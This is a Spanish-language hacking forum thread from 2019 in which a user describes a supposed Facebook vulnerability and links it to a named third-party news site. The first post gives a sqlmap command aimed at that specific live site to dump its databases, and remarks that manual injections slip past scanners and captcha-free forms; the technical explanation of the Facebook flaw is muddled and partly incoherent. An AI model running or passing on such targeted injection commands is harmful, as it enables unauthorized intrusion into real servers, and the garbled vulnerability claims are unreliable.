Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Facebook vulnerabilidad

  • 2 Respuestas
  • 335 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado jonathanvlan

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    5%
  • Reputación 2
    • Ver Perfil
    • Email
« en: Junio 10, 2019, 11:38:03 pm »
Hola chicos  comparto una vulnerabilidad que encontre en facebook , bueno de echo fueron 2 vulnerabilidades  ya reportadas
aunque el personal de seguridad de facebook se basan en escaneres de vulnerabilidades  desechan  los posibles errores

investigando un poco  encontre una parte de lo que afecta , facebook solo injecta codigo pero eso conduce a paginas vulnerables, siendo facebook el causante

ID vulnerable \"BanzaiODS



https://m.facebook.com/help/community/see_more/554541301252701/?list_offset=0&mount_id=help_community_question_more_answers

https://m.facebook.com/help/community/see_more/983034871735213/?list_offset=0&mount_id=help_community_question_more_answers

La linea del servidor puede ser configurable
https://m.facebook.com/help/community/see_more/983034871735213/?list_offset=45&mount_id=config




La respuesta sera diferente

Este codigo HTML mal configurado conduce a errores en paginas donde se utilize facebook
por ejemplo / https://video-nik.ml/noc.php
Su estructura depende de su servidor


Código: [Seleccionar]
for (;;);{"__ar":1,"error":1357001,"errorSummary":"No has entrado","errorDescription":"Entra para continuar.","payload":{"__dialog":{"title":{"__html":"No has iniciado sesi\u00f3n"},
"http\\u00253A\\u00252F\\u00252Ffacebook.com\\u00252F\", true);"}],"modal":true,"

De igual forma puede comprometer estructuras internas



La vulnerabilidad de ID se introduce a servidores grandes

http://services.myanmars.net/rss/thevoice.php?

http://services.myanmars.net/rss/thevoice.php?chk=true
El cual permite Injeccion Vulnerable
El IDS mostrara el tipo de seguridad This error was generated by Mod_Security.




Servidor afectado * http://services.myanmars.net/
Pagina facebook * https://www.facebook.com/MyanmarNewsBlog/
Usuarios* 368.791 personas


injeccion sqlmap -u http://services.myanmars.net/rss/thevoice.php?chk=true --drop-set-coockie  --random-agent  --tamnper= ....... --dbs

La vulnerabilidad presente de IDS compromete el servidor que este utilizando ese codigo permitiendo obtener el control de facebook shared incluso su base de datos del servidor , De esta forma esta vulnerabilidad de facebook  permite localizar y explotar servidores que de pendan de su codigo  , en algunos casos son registrados en inicio de session
« Última modificación: Junio 10, 2019, 11:40:11 pm por jonathanvlan »

Desconectado jonathanvlan

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    5%
  • Reputación 2
    • Ver Perfil
    • Email
« Respuesta #1 en: Junio 11, 2019, 12:00:23 am »
Funciones de Facebook

https://m.facebook.com/qp/action/close/?qp_id=938606562977614&qp_nux_id=4383&qp_refresh_on_redirect=0&qp_action=dismiss&qp_instance_log_data[app_growth_upsell_id]=938606562977614&qp_instance_log_data[app_growth_impression_id]=0830844e-4260-5a26-6244-7f5ab63e56ae&qp_instance_log_data[randomization_seed]=1559011993&qp_instance_log_data[uuid]=a807ac37-18db-b26c-2620-a8bd88bfd607&qp_instance_log_data[viewer_id]=100026857641712&qp_close_window=0

Toda la estructura puede ser modificable para mas respuesta del servidor

https://m.facebook.com/qp/action/close/?qp_id=938606562977614&qp_nux_id=4383&qp_refresh_on_redirect=0&qp_action=dismiss&qp_instance_log_data[app_growth_upsell_id]=938606562977614&qp_instance_log_data[app_growth_impression_id]=0830844e-4260-5a26-6244-7f5ab63e56ae&qp_instance_log_data[randomization_seed]=1559011993&qp_instance_log_data[uuid]=a807ac37-18db-b26c-2620-a8bd88bfd607&qp_instance_log_data[viewer_id]=100026857641712&qp_close_window=45

Se puede ir provando configuraciones para mas respuestas del servidor en texto plano , aunque antes de reportarla me entregaba
mayor informacion sobre su estructura internea que recolecta facebook  de las personas  , browser , os , geo ip , etc

CERRADO Whitehat Report #140592797116068  /

Seguramente buscando puede dar mayores vulnerabilidades  , lo que me pude percatar es que estando en estos errores los intentos de intrusion son infinitos sin una seguridad que pueda detener un ataque por ejemplo capcha inexistente ,  de igual forma su inteligencia artificial es basica unicamente deteniendo escaneres de vulnerabilidades  pero no injecciones manuales

Desconectado dannybombastic

  • *
  • Underc0der
  • Mensajes: 23
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Junio 11, 2019, 06:42:38 am »
Mola  ;) gracias por la info y el detalle que tengas un magnifico dia

Sent from my SM-G960F using Tapatalk


 

¿Te gustó el post? COMPARTILO!



Hacking de cuentas de Hotmail y Facebook por Sql Injection

Iniciado por k43l

Respuestas: 8
Vistas: 18129
Último mensaje Agosto 30, 2012, 04:40:20 am
por andrewtwo
Clickjacking + Facebook = Likejacking

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1976
Último mensaje Julio 17, 2011, 08:11:32 pm
por LucaSthefano
Vulnerabilidad en Kali Linux Sana 2.0 CVE-2015-2008 Auditoria Omar Rodriguez

Iniciado por DaRK UnLiMiTeD

Respuestas: 0
Vistas: 3159
Último mensaje Septiembre 28, 2015, 10:37:40 pm
por DaRK UnLiMiTeD
Dirty COW - CVE-2016-5195 explotando vulnerabilidad en el Kernel de Linux

Iniciado por BrowserNet

Respuestas: 5
Vistas: 5627
Último mensaje Diciembre 26, 2016, 03:44:26 am
por Dr4g0n4Y
Instalación de BadStore en VirtualBox [Vulnerabilidad virtual para practicar]

Iniciado por Stiuvert

Respuestas: 0
Vistas: 3104
Último mensaje Abril 23, 2012, 05:28:08 pm
por Stiuvert